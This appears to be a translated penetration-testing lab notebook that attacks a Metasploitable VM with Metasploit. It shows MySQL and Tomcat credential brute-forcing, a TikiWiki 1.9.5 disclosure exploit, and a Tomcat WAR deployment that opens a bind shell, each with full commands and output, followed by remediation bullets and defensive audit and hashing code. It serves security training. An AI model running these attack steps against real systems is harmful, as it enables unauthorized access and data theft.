auxiliary/scanner/mysql/mysql_version normal MySQL Server Version Enumeration
msf auxiliary(scanner/ftp/ftp_login) > use auxiliary/scanner/mysql/mysql_version
msf auxiliary(scanner/mysql/mysql_version) > show options
Module options (auxiliary/scanner/mysql/mysql_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.20.0/24
rhosts => 192.168.20.0/24
msf auxiliary(scanner/mysql/mysql_version) > set threads 16
threads => 16
msf auxiliary(scanner/mysql/mysql_version) > exploit
[*] Scanned 28 of 256 hosts (10% complete)
[*] Scanned 53 of 256 hosts (20% complete)
[*] Scanned 77 of 256 hosts (30% complete)
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 130 of 256 hosts (50% complete)
[*] Scanned 158 of 256 hosts (61% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 206 of 256 hosts (80% complete)
[-] 192.168.20.204:3306 - The connection to 192.168.20.204:3306 timed out
[*] Scanned 237 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
2) Dictionary attack using 'mysql_login'
msf auxiliary(scanner/mysql/mysql_version) > search mysql_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf auxiliary(scanner/mysql/mysql_version) > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.20.204
rhosts => 192.168.20.204
msf auxiliary(scanner/mysql/mysql_login) > set user_file /root/wordlists/user.list
user_file => /root/wordlists/user.list
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /root/wordlists/pass.list
pass_file => /root/wordlists/pass.list
msf auxiliary(scanner/mysql/mysql_login) > set threads 16
threads => 16
msf auxiliary(scanner/mysql/mysql_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/mysql/mysql_login) > exploit
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Found remote MySQL version 5.0.51a
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:admin (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
~ (omitted) ~
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: root:administrator (Incorrect: Access denied for user 'root'@'192.168.20.50' (using password: YES))
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Success: 'root:'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mysql/mysql_login) > unset user_file
Unsetting user_file...
msf auxiliary(scanner/mysql/mysql_login) > unset pass_file
Unsetting pass_file...
msf auxiliary(scanner/mysql/mysql_login) > set userpass_file /root/wordlists/userpass.list
userpass_file => /root/wordlists/userpass.list
msf auxiliary(scanner/mysql/mysql_login) >
msf auxiliary(scanner/mysql/mysql_login) > set stop_on_success false
stop_on_success => false
msf auxiliary(scanner/mysql/mysql_login) > exploit
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Found remote MySQL version 5.0.51a
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:1111 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:1234 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: admin:0000 (Incorrect: Access denied for user 'admin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: administrator:toor1234. (Incorrect: Access denied for user 'administrator'@'192.168.20.50' (using password: YES))
[+] 192.168.20.204:3306 - 192.168.20.204:3306 - Success: 'root:'
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: msfadmin:msfadmin (Incorrect: Access denied for user 'msfadmin'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user1:user1 (Incorrect: Access denied for user 'user1'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user2:user2 (Incorrect: Access denied for user 'user2'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user01:user01 (Incorrect: Access denied for user 'user01'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user01:toor1234. (Incorrect: Access denied for user 'user01'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: user02:user02 (Incorrect: Access denied for user 'user02'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: tomcat:tomcat (Incorrect: Access denied for user 'tomcat'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: postgres:postgres (Incorrect: Access denied for user 'postgres'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: mysql:mysql (Incorrect: Access denied for user 'mysql'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: cisco:cisco (Incorrect: Access denied for user 'cisco'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: test:test (Incorrect: Access denied for user 'test'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: tester:tester (Incorrect: Access denied for user 'tester'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: ftpuser:ftpuser (Incorrect: Access denied for user 'ftpuser'@'192.168.20.50' (using password: YES))
[-] 192.168.20.204:3306 - 192.168.20.204:3306 - LOGIN FAILED: ftpusers:ftpusers (Incorrect: Access denied for user 'ftpusers'@'192.168.20.50' (using password: YES))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/mysql/mysql_login) > back
msf >
3) Remote MySQL login attempt
- From another terminal window on Kali, log in remotely to MySQL on Meta (192.168.20.204).
root@kali:~# mysql -h 192.168.20.204 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)
MySQL [mysql]> desc user;
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(16) | NO | PRI | | |
| Password | char(41) | NO | | | |
~ (omitted) ~
MySQL [mysql]> select host,user,password from user;
+------+------------------+----------+
| host | user | password |
+------+------------------+----------+
| | debian-sys-maint | |
| % | root | |
| % | guest | |
+------+------------------+----------+
3 rows in set (0.00 sec)
MySQL [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki195]> show tables;
~ omitted ~
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
MySQL [tikiwiki195]> desc users_users;
+------------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+--------------+------+-----+---------+----------------+
| userId | int(8) | NO | PRI | NULL | auto_increment |
| email | varchar(200) | YES | | NULL | |
| login | varchar(40) | NO | | | |
| password | varchar(30) | YES | | | |
MySQL [tikiwiki195]> select userid,email,login,password from users_users;
+--------+-------+-------+----------+
| userid | email | login | password |
+--------+-------+-------+----------+
| 1 | | admin | admin |
+--------+-------+-------+----------+
1 row in set (0.00 sec)
MySQL [tikiwiki195]> exit
Bye
root@kali:~#
4) Remediation
- Set a MySQL administrator password
- Enforce password complexity
- Disable remote MySQL login
[Note] Password strength check site
- https://www.security.org/how-secure-is-my-password
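The three remediation bullets above can be turned into a repeatable check. The following Python audit is an added example (not from the original notes) that takes the rows the "select host,user,password from user" query returned and flags exactly what the bullets target: accounts with no password, accounts reachable from any host ('%'), and an administrator account exposed to remote login; it also applies a simple complexity rule to a candidate password before it is set. The sample rows are constructed from the output above, and the 12-character minimum and the "three of four character classes" rule are assumed policy values, not something the notes specify.

```python
import re

# Constructed sample: the three rows returned by
# "select host,user,password from user" in the notes ('' = no password set).
SAMPLE_USER_ROWS = [
    ("",  "debian-sys-maint", ""),
    ("%", "root",             ""),
    ("%", "guest",            ""),
]

MIN_LENGTH = 12            # assumed policy threshold, not taken from the notes
ADMIN_ACCOUNTS = {"root"}  # accounts that should never be reachable remotely


def password_complexity_issues(password):
    """Return the complexity rules a candidate plaintext password fails (empty list = passes)."""
    issues = []
    if len(password) < MIN_LENGTH:
        issues.append(f"shorter than {MIN_LENGTH} characters")
    classes = {
        "lowercase": re.search(r"[a-z]", password),
        "uppercase": re.search(r"[A-Z]", password),
        "digit":     re.search(r"[0-9]", password),
        "symbol":    re.search(r"[^A-Za-z0-9]", password),
    }
    missing = [name for name, found in classes.items() if not found]
    if len(missing) > 1:  # assumed rule: at least three of the four classes must be present
        issues.append("missing character classes: " + ", ".join(missing))
    return issues


def audit_mysql_accounts(rows):
    """Map (host, user) -> list of findings that match the remediation list above."""
    findings = {}
    for host, user, stored_password in rows:
        problems = []
        if stored_password == "":
            problems.append("no password set")
        if user == "":
            problems.append("anonymous account")
        if host == "%":
            problems.append("reachable from any host (remote login allowed)")
            if user in ADMIN_ACCOUNTS:
                problems.append("administrator account exposed to remote login")
        if problems:
            findings[(host, user)] = problems
    return findings


def audit_report(rows):
    """Human-readable version of audit_mysql_accounts for command-line use."""
    lines = []
    for (host, user), problems in audit_mysql_accounts(rows).items():
        lines.append(f"'{user}'@'{host or '<empty>'}': " + "; ".join(problems))
    return "\n".join(lines)


if __name__ == "__main__":
    print(audit_report(SAMPLE_USER_ROWS))
    for candidate in ("toor", "Correct-Horse-9x"):
        print(candidate, "->", password_complexity_issues(candidate) or "ok")
```

Every row in the sample is flagged for an empty password, and root is additionally flagged because '%' lets it be reached from any host, which is the condition the remote login in this section relies on. Restricting the host column of administrative accounts to localhost (or binding the server to 127.0.0.1 with bind-address in my.cnf) is what the "disable remote login" bullet means in practice.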
8. Cracking the MySQL ID/PASSWORD using the 'tikiwiki 1.9.5' vulnerability
- A bulletin-board (wiki) service that a group can use and work on collaboratively (posts can be edited)
- Ex) Namuwiki, Zetawiki, TikiWiki
1) Enabling the tikiwiki195 database
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php &
TikiWiki is not properly set up:
Unable to connect to the database !
Go here to begin the installation process, if you haven't done so already.
----------------------------------------------- click
Access denied for user 'root'@'localhost' (using password: YES)
Database type: MySQL
Host: localhost
User: root
Password:
Database name: tikiwiki195
[Send query] <- click
Install
Create database (clean install) with profile: [Default Installation profile] [create] <- click
2) Cracking the MySQL administrator ID/password with 'tikidblib'
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/admin/tikiwiki
tikidblib.rb
- This attack exploits a vulnerability in the TikiWiki web page source code to retrieve the ID/PASSWORD of the MySQL instance backing the TikiWiki web service.
msf > search tikiwiki
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent Tiki Wiki unserialize() PHP Code Execution
exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Tiki Wiki Unauthenticated File Upload Vulnerability
msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(admin/tikiwiki/tikidblib) > show options
Module options (auxiliary/admin/tikiwiki/tikidblib):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Download
msf auxiliary(admin/tikiwiki/tikidblib) > set rhost 192.168.20.204
rhost => 192.168.20.204
msf auxiliary(admin/tikiwiki/tikidblib) > exploit
[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password :
[*] Auxiliary module execution completed
msf auxiliary(admin/tikiwiki/tikidblib) >
3) Attempting a remote MySQL login
- From another terminal window on Kali, log in remotely to MySQL on Meta (192.168.20.204).
root@kali:~# mysql -h 192.168.20.204 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 74
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.00 sec)
MySQL [mysql]> desc user;
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------------+-----------------------------------+------+-----+---------+-------+
| Host | char(60) | NO | PRI | | |
| User | char(16) | NO | PRI | | |
| Password | char(41) | NO | | | |
~ omitted ~
MySQL [mysql]> select host,user,password from user;
+------+------------------+----------+
| host | user | password |
+------+------------------+----------+
| | debian-sys-maint | |
| % | root | |
| % | guest | |
+------+------------------+----------+
3 rows in set (0.00 sec)
MySQL [mysql]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki195]> show tables;
~ omitted ~
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
MySQL [tikiwiki195]> desc users_users;
+------------------+--------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+------------------+--------------+------+-----+---------+----------------+
| userId | int(8) | NO | PRI | NULL | auto_increment |
| email | varchar(200) | YES | | NULL | |
| login | varchar(40) | NO | | | |
| password | varchar(30) | YES | | | |
MySQL [tikiwiki195]> select userid,email,login,password from users_users;
+--------+-------+-------+----------+
| userid | email | login | password |
+--------+-------+-------+----------+
| 1 | | admin | admin |
+--------+-------+-------+----------+
1 row in set (0.00 sec)
4) Logging in to the tikiwiki admin page (admin/admin)
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php
5) Remediation
- Upgrade and patch TikiWiki 1.9.5
- Set a MySQL administrator password
- Enforce password complexity
- Disable remote MySQL login
- Store MySQL and web-page administrator passwords as hash values rather than in plaintext
[Note] TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure
- Reference: https://www.exploit-db.com/exploits/2701
- Kali terminal -> firefox & -> address bar -> http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
- Kali terminal -> firefox & -> address bar -> http://192.168.20.204/tikiwiki/tiki-lastchanges.php?days=1&offset=0&sort_mode=
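The last remediation bullet (hash values instead of plaintext) is what would have stopped the users_users query above from handing over admin/admin directly. The following Python block is an added example, not code from the notes or from TikiWiki, showing the storage format a web application should use: a salted PBKDF2-HMAC-SHA256 digest in a self-describing string, verified in constant time, plus a check that recognises a legacy plaintext value so it can be migrated on the user's next successful login. The LEGACY_ROW dict is constructed from the users_users row shown above, and the 600,000 iteration count is an assumed work factor.

```python
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # assumed work factor; tune to the deployment's hardware


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing salted hash: algorithm$iterations$salt$digest (base64 parts)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        ALGORITHM,
        str(iterations),
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(digest).decode("ascii"),
    ])


def verify_password(password, stored):
    """Recompute the digest with the stored salt/iterations and compare in constant time."""
    try:
        algorithm, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False  # not in our format (for example a legacy plaintext value)
    if algorithm != ALGORITHM:
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


def is_legacy_plaintext(stored):
    """True when a stored value is not in the hashed format, e.g. the 'admin' row in the notes."""
    parts = stored.split("$")
    return not (len(parts) == 4 and parts[0] == ALGORITHM)


# Constructed row mirroring users_users in the notes: the password column holds 'admin' in the clear.
LEGACY_ROW = {"userId": 1, "login": "admin", "password": "admin"}


def migrate_row(row, plaintext):
    """Replace a legacy plaintext value with its hash (plaintext is available at a successful login)."""
    return {**row, "password": hash_password(plaintext)}


if __name__ == "__main__":
    migrated = migrate_row(LEGACY_ROW, LEGACY_ROW["password"])
    print(migrated["password"])
    print("verify admin :", verify_password("admin", migrated["password"]))
    print("verify Admin :", verify_password("Admin", migrated["password"]))
```

One schema consequence worth noting: the users_users.password column above is varchar(30), while this format is about 90 characters (13 for the algorithm name, 6 for the iteration count, 24 and 44 for the base64 salt and digest, plus separators), so widening the column is part of the migration.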
9. Cracking the 'Tomcat' administrator ID/PW
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/scanner/http | grep tomcat
tomcat_enum.rb
tomcat_mgr_login.rb
- Tomcat: web-service middleware that processes the JSP requests received by the Apache web server
- This attack runs a dictionary attack against a web server with the Tomcat service enabled in order to find the Tomcat administrator ID/PASSWORD.
- Once the attacker knows the ID/PASSWORD, they can log in as the Tomcat administrator and upload malicious code, tamper with data, or exfiltrate it.
1) Checking the Apache/Tomcat scan information for Meta (192.168.20.204)
msf > services 192.168.20.204
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.204 21 tcp ftp open 220 (vsFTPd 2.3.4)\x0d\x0a
192.168.20.204 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.20.204 23 tcp telnet open Linux telnetd
192.168.20.204 25 tcp smtp open Postfix smtpd
192.168.20.204 53 tcp domain open ISC BIND 9.4.2
192.168.20.204 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.20.204 111 tcp rpcbind open 2 RPC #100000
~ omitted ~
192.168.20.204 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.20.204 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.20.204 8787 tcp drb open Ruby DRb RMI Ruby 1.8; path /usr/lib/ruby/1.8/drb
2) Dictionary attack using 'tomcat_mgr_login'
msf > search tomcat_mgr_login
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.20.204
rhosts => 192.168.20.204
msf auxiliary(scanner/http/tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
stop_on_success => true
msf auxiliary(scanner/http/tomcat_mgr_login) > set threads 16
threads => 16
msf auxiliary(scanner/http/tomcat_mgr_login) > exploit
[-] 192.168.20.204:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.20.204:8180 - LOGIN FAILED: admin:manager (Incorrect)
~ omitted ~
[-] 192.168.20.204:8180 - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.20.204:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.20.204:8180 - Login Successful: tomcat:tomcat
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/tomcat_mgr_login) >
3) Logging in to the tomcat manager page (tomcat/tomcat)
root@kali:~# firefox http://192.168.20.204:8180/manager/html &
4) Uploading a malicious payload (java/shell/bind_tcp) with 'tomcat_mgr_deploy'
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/multi/http | grep tomcat
tomcat_jsp_upload_bypass.rb
tomcat_mgr_deploy.rb
tomcat_mgr_upload.rb
msf auxiliary(scanner/http/tomcat_mgr_login) > search tomcat_mgr_deploy
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
msf auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword no The password for the specified username
HttpUsername no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > set httppassword tomcat
httppassword => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set httpusername tomcat
httpusername => tomcat
msf exploit(multi/http/tomcat_mgr_deploy) > set rhost 192.168.20.204
rhost => 192.168.20.204
msf exploit(multi/http/tomcat_mgr_deploy) > set rport 8180
msf exploit(multi/http/tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(multi/http/tomcat_mgr_deploy) > set payload java/shell/bind_tcp
payload => java/shell/bind_tcp
msf exploit(multi/http/tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword tomcat no The password for the specified username
HttpUsername tomcat no The username to authenticate as
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.20.204 yes The target address
RPORT 8180 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.20.204 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(multi/http/tomcat_mgr_deploy) > exploit // If the session fails to connect, run 'exploit' again.
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6243 bytes as 6Yyvw8QjFVL.war ...
[*] Executing /6Yyvw8QjFVL/BZbjHiLu85HKuAU9RmK4cQ4.jsp...
[*] Undeploying 6Yyvw8QjFVL ...
[*] Exploit completed, but no session was created.
msf exploit(multi/http/tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Sending stage (2952 bytes) to 192.168.20.204
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6256 bytes as ZQrDThFsLG2ymE6tarF85gw3.war ...
[*] Executing /ZQrDThFsLG2ymE6tarF85gw3/RlNeouBL9.jsp...
[*] Undeploying ZQrDThFsLG2ymE6tarF85gw3 ...
[*] Command shell session 1 opened (192.168.20.50:35965 -> 192.168.20.204:4444) at 2022-05-21 17:31:43 +0900
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
whoami
tomcat55
pwd
/
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$
tomcat55@metasploitable:/$ ^C
Abort session 1? [y/N] y
[*] 192.168.20.204 - Command shell session 1 closed. Reason: User exit
msf exploit(multi/http/tomcat_mgr_deploy) >
